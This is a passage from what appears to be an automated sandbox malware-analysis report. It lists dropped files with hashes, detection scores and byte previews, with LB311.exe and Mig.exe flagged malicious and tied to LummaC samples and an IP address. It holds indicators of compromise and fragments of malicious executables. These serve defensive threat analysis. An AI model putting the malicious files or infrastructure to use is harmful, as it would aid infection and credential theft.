                                    rHrG691f7q.exeGet hashmaliciousLummaCBrowse
                                    • 176.113.115.19
                                    TN78WX7nJU.exeGet hashmaliciousLummaCBrowse
                                    • 176.113.115.19

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    C:\Users\user\AppData\Roaming\LB311.exefile.exeGet hashmaliciousUnknownBrowse
                                      YSU1PShcKh.exeGet hashmaliciousUnknownBrowse
                                        file.exeGet hashmaliciousUnknownBrowse
                                          C:\ProgramData\Mig\Mig.exefile.exeGet hashmaliciousUnknownBrowse
                                            YSU1PShcKh.exeGet hashmaliciousUnknownBrowse
                                              file.exeGet hashmaliciousUnknownBrowse

                                                Created / dropped Files

                                                C:\ProgramData\Mig\Mig.exe

                                                Download File
                                                Process:C:\Users\user\AppData\Roaming\LB311.exe
                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                Category:dropped
                                                Size (bytes):7679488
                                                Entropy (8bit):7.744308216067832
                                                Encrypted:false
                                                SSDEEP:196608:/UUPSHwaRhOgwVPj04wfOAlM69LJDuHF:dKHwgt+Pov7y
                                                MD5:C9E6AA21979D5FC710F1F2E8226D9DFE
                                                SHA1:D881F97A1FE03F43BED2A9609EAE65531CF710CF
                                                SHA-256:A1A8CFCC74F8F96FD09115189DEFE07AC6FC2E85A9FF3B3EC9C6F454AEDE1C1D
                                                SHA-512:9E90BCB64B0E1F03E05990CDEAD076B4C6E0B050932ECB953DAE50B7E92B823A80FC66D1FD8753591719E89B405757B2BF7518814BC6A19BB745124D1A691627
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 63%
                                                Joe Sandbox View:
                                                • Filename: file.exe, Detection: malicious, Browse
                                                • Filename: YSU1PShcKh.exe, Detection: malicious, Browse
                                                • Filename: file.exe, Detection: malicious, Browse
                                                Preview:MZx.....................@...................................x...hr......!..L.!This program cannot be run in DOS mode.$..PE..d...^n.e.........."..........xT...............@.....................................u...`...................................................U.......S.f... ..............."..............................`"..(................................................... . ..S.......R.................@....rsrc...f.....S.......R.............@....idata ......U.......S.............@... ..8...U.......S.............@...ndryujmp.p!..`...f!...S.............@...tnyudguu............*u.............@....pdata.I............,u.............@..@................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Microsoft\Vault\UserProfileRoaming\Latest.dat

                                                Download File
                                                Process:C:\Windows\System32\lsass.exe
                                                File Type:very short file (no magic)
                                                Category:modified
                                                Size (bytes):1
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3::
                                                MD5:93B885ADFE0DA089CDF634904FD59F71
                                                SHA1:5BA93C9DB0CFF93F52B521D7420E43F6EDA2784F
                                                SHA-256:6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D
                                                SHA-512:B8244D028981D693AF7B456AF8EFA4CAD63D282E19FF14942C246E50D9351D22704A802A71C3580B6370DE4CEB293C324A8423342557D4E5C38438F0E36910EE
                                                Malicious:false
                                                Preview:.

                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                Download File
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):11608
                                                Entropy (8bit):4.890472898059848
                                                Encrypted:false
                                                SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                                                MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                                                SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                                                SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                                                SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                                                Malicious:false
                                                Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                Download File
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):64
                                                Entropy (8bit):0.34726597513537405
                                                Encrypted:false
                                                SSDEEP:3:Nlll:Nll
                                                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                Malicious:false
                                                Preview:@...e...........................................................

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0gja1kcl.zyb.psm1

                                                Download File
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0yq5qche.hvs.ps1

                                                Download File
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0yssfrnf.n4v.ps1

                                                Download File
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3zx0xyio.hal.ps1

                                                Download File
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_appywb3p.auw.ps1

                                                Download File
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_icph3qcb.b2t.psm1

                                                Download File
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kht3zcm4.o2c.ps1

                                                Download File
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rcui0o2w.11w.psm1

                                                Download File
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rwlsiedf.1wy.psm1

                                                Download File
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zpcxgyeb.3p3.psm1

                                                Download File
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Roaming\LB311.exe

                                                Download File
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                Category:dropped
                                                Size (bytes):7679488
                                                Entropy (8bit):7.744308216067832
                                                Encrypted:false
                                                SSDEEP:196608:/UUPSHwaRhOgwVPj04wfOAlM69LJDuHF:dKHwgt+Pov7y
                                                MD5:C9E6AA21979D5FC710F1F2E8226D9DFE
                                                SHA1:D881F97A1FE03F43BED2A9609EAE65531CF710CF
                                                SHA-256:A1A8CFCC74F8F96FD09115189DEFE07AC6FC2E85A9FF3B3EC9C6F454AEDE1C1D
                                                SHA-512:9E90BCB64B0E1F03E05990CDEAD076B4C6E0B050932ECB953DAE50B7E92B823A80FC66D1FD8753591719E89B405757B2BF7518814BC6A19BB745124D1A691627
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 63%
                                                Joe Sandbox View:
                                                • Filename: file.exe, Detection: malicious, Browse
                                                • Filename: YSU1PShcKh.exe, Detection: malicious, Browse
                                                • Filename: file.exe, Detection: malicious, Browse
                                                Preview:MZx.....................@...................................x...hr......!..L.!This program cannot be run in DOS mode.$..PE..d...^n.e.........."..........xT...............@.....................................u...`...................................................U.......S.f... ..............."..............................`"..(................................................... . ..S.......R.................@....rsrc...f.....S.......R.............@....idata ......U.......S.............@... ..8...U.......S.............@...ndryujmp.p!..`...f!...S.............@...tnyudguu............*u.............@....pdata.I............,u.............@..@................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                Download File
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):6222
                                                Entropy (8bit):3.7219239988820956
                                                Encrypted:false
                                                SSDEEP:96:T8QCXP87kvhkvCCtcsMp/ZxHRQMp/ZaHRz:T8fPUcs0xQ0gz
                                                MD5:5E1470BC927CE5260E08C0C54E346B5B
                                                SHA1:F8E26E7E469D8F57BDE045B8AB0C794398BA8009
                                                SHA-256:F184A54BACE3DB519863E6EE293383B00D40E71F414F82A35323ABF3ADCFDADF
                                                SHA-512:61E4C5376ECDFD1996C27FF7296372DADF49DDE13A836BCBB4F003900163074C178C80CCF172636C111DA369C1091A984991DF485AE20E85B388D5D6175DA824
                                                Malicious:false
                                                Preview:...................................FL..................F.".. ......Yd.......MQ..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......y.Yd....28.MQ...2*.MQ......t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)B.Y.h..........................d...A.p.p.D.a.t.a...B.V.1......Y.h..Roaming.@......EW)B.Y.h..............................R.o.a.m.i.n.g.....\.1.....EW.C..MICROS~1..D......EW)B.Y.h............................ .M.i.c.r.o.s.o.f.t.....V.1.....EW.D..Windows.@......EW)B.Y.h..........................$A..W.i.n.d.o.w.s.......1.....EW+B..STARTM~1..n......EW)B.Y.h....................D.....b60.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW(C..Programs..j......EW)B.Y.h....................@.......D.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)BEW)B..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW)B.Y.h.....0..........

                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LX2LH03MDZUGO4OYGW3I.temp

                                                Download File
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):6222
                                                Entropy (8bit):3.7219239988820956
                                                Encrypted:false
                                                SSDEEP:96:T8QCXP87kvhkvCCtcsMp/ZxHRQMp/ZaHRz:T8fPUcs0xQ0gz
                                                MD5:5E1470BC927CE5260E08C0C54E346B5B
                                                SHA1:F8E26E7E469D8F57BDE045B8AB0C794398BA8009
                                                SHA-256:F184A54BACE3DB519863E6EE293383B00D40E71F414F82A35323ABF3ADCFDADF
                                                SHA-512:61E4C5376ECDFD1996C27FF7296372DADF49DDE13A836BCBB4F003900163074C178C80CCF172636C111DA369C1091A984991DF485AE20E85B388D5D6175DA824
                                                Malicious:false
                                                Preview:...................................FL..................F.".. ......Yd.......MQ..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......y.Yd....28.MQ...2*.MQ......t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)B.Y.h..........................d...A.p.p.D.a.t.a...B.V.1......Y.h..Roaming.@......EW)B.Y.h..............................R.o.a.m.i.n.g.....\.1.....EW.C..MICROS~1..D......EW)B.Y.h............................ .M.i.c.r.o.s.o.f.t.....V.1.....EW.D..Windows.@......EW)B.Y.h..........................$A..W.i.n.d.o.w.s.......1.....EW+B..STARTM~1..n......EW)B.Y.h....................D.....b60.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW(C..Programs..j......EW)B.Y.h....................@.......D.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)BEW)B..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW)B.Y.h.....0..........

                                                C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log

                                                Download File
                                                Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:modified
                                                Size (bytes):2464
                                                Entropy (8bit):3.24213640463067
                                                Encrypted:false
                                                SSDEEP:24:QOaqdmuF3rlQl+kWReHgHttUKlDENh+pyMySn6tUKlDENh+pyMySwwIPVxcwIPV3:FaqdF7el+AAHdKoqKFxcxkFY/
                                                MD5:EB0721679669FD693F2A4C5750E2E039
                                                SHA1:0953B7669ED25E97ACEC13BB09ED9DB5D339B02A
                                                SHA-256:C85E01FCE964705328EE6C3EEDB6C931435B1A50B19927A702C7B36186F1C91D
                                                SHA-512:C3AD988FC8D18B39AA8ECA016AF1BBDABB834DAB23400E35B1BF1EB75111BC0BD58757DE1DFF560C2515742598EF396C37F269CD45FEC3E7A791A097741DF9B2
                                                Malicious:false
                                                Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. W.e.d. .. D.e.c. .. 1.8. .. 2.0.2.4. .0.8.:.0.7.:.5.2.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .W.S.C. .S.t.a.t.e. .I.n.f.o. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .A.n.t.i.V.i.r.u.s.P.r.o.d.u.c.t. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....d.i.s.p.l.a.y.N.a.m.e. .=. .[.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.].....p.a.t.h.T.o.S.i.g.n.e.d.P.r.o.d.u.c.t.E.x.e. .=. .[.w.i.n.d.o.w.s.d.

                                                C:\Windows\System32\winevt\Logs\Application.evtx

                                                Download File
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:dBase III DBT, next free block index 1130785861, 1st item "**"
                                                Category:dropped
                                                Size (bytes):69216
                                                Entropy (8bit):4.21486714586012
                                                Encrypted:false
                                                SSDEEP:768:wtCkdNtCkd831jjHCOAskRMcibq7P5rAKP5feZ7IHoDsMMcAa5:CtC31dtkucIuPuKPBU
                                                MD5:59698D4F159EEC75E1073F46B2665347
                                                SHA1:B489F1D351E190D0F9E9FBD0E1F120020D0B8E65
                                                SHA-256:1FC443BBADF0531B883CD7D8AE1B25D5B57B170F45A6440E4A35A7804FBCB3DA
                                                SHA-512:AA4EB5B40C7A532007997442CEA1A66A58A6173DBA78C7E5D2AFF24C7B40B6805ADBB4CD12A76A343AD60E043E78778B54A4FE0716FEE47BE2FA060D2F38056D
                                                Malicious:false
                                                Preview:ElfChnk.................[.......]...........P...`....0........................................................................V.............................................=...........................................................................................................................g...............@...........................n...................M...]...........................j...........................~...........................................&...............................................**..X...[.........d.MQ.........3d.&........3d....P..k..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Z............{..P.r.o.v.i.d.e.r...7...F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.e.c.u.r.i.t.y.-.S.P.P.F........)...G.u.i.d.....&.{.E.2.3.B.3.3.B.0.-.C.8.C.9.-.4.7.2.C.-.A.5.F.9.-.F.2.B.D.F.E.

                                                C:\Windows\System32\winevt\Logs\Microsoft-Client-Licensing-Platform%4Admin.evtx

                                                Download File
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):3.3161290049594982
                                                Encrypted:false
                                                SSDEEP:384:ehe6UHi2uepX7xasnPC3FzFtpFDhFPFyF842v86:eVUHiapX7xadptrDT9W84H6
                                                MD5:03FF38CB61FB3E653A6543E43BE15C6A
                                                SHA1:C19DB39CF089E0321E251A790A15F06F3AB7ACB8
                                                SHA-256:8F304111617A19556EC1ACF27807CDB6880F9F88296FA415D8A9BEBE03697F74
                                                SHA-512:64D011136A46443568DC2239ED64EB0045479395D762F1BC2A9287AF864708085E89C556DE191D8DC1634B8D5E754B7946051024B453935C227C37F396CCF33A
                                                Malicious:false
                                                Preview:ElfChnk.........7...............7....................Ig.......................................................................t................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........r...................m..............qo...................>...;..................**..............4.9...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppModel-Runtime%4Admin.evtx

                                                Download File
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.377721629524822
                                                Encrypted:false
                                                SSDEEP:384:fhZN/GN6N/NDsNadNDtNkN6NQNQxNhdNQaNwNwNONPNavNqN6NfNjNALNCNyN7Ns:fZeIPRThtUmqYXL3QXr0Q7
                                                MD5:B59AFB7FCA4C7067FBB3EF413064809B
                                                SHA1:785A500AA8ADA1D59F3F7FD48E876F2305E7072D
                                                SHA-256:ED35583D239B8BBF565E20C872268401F9D05A4DCCE4ABA7F83BA99A5978FD95
                                                SHA-512:C86B8AE075AA4E669D9DE8EDC1C3E430D68F1A155153EE7B4C7B1898E03E42334C37FFAE7CD35B759EB019822762C7048083BEA711439FAA1D869360CE59CD88
                                                Malicious:false
                                                Preview:ElfChnk.{...............{..........................[.x......................................................................D.\........................................V...=...........................................................................................................................f...............?...........................m...................M...F...................=c......................=j...........................?......]...............................................-g..................**......{.......n=.df..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppXDeployment%4Operational.evtx

                                                Download File
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.283376077480789
                                                Encrypted:false
                                                SSDEEP:384:MhMVnRVSV3V9VbVSV5VjVMV/V1VQVPTV0V6V6VoVbVaVVVlVlVmVTVwVgVAV1VKp:M+HlSAi20Hl6Mun
                                                MD5:B430A867EFFA6C10DB7849040A0A7846
                                                SHA1:C6A2A5172C0FE90AE859C9F43848E32B325FB4A3
                                                SHA-256:A153A60CDD9A3D50F00CD67B73BEC9F83202A91E46E311626C12AAC5B027EE76
                                                SHA-512:33449904F5A4126CA4DD702A8074EFD9B3CD7A9F4F14308420D5F8F2827028A79F6F43B5A3AC417BFD6196A0AB312727A2F0755EDC48A95FEFB8743F4C4CD896
                                                Malicious:false
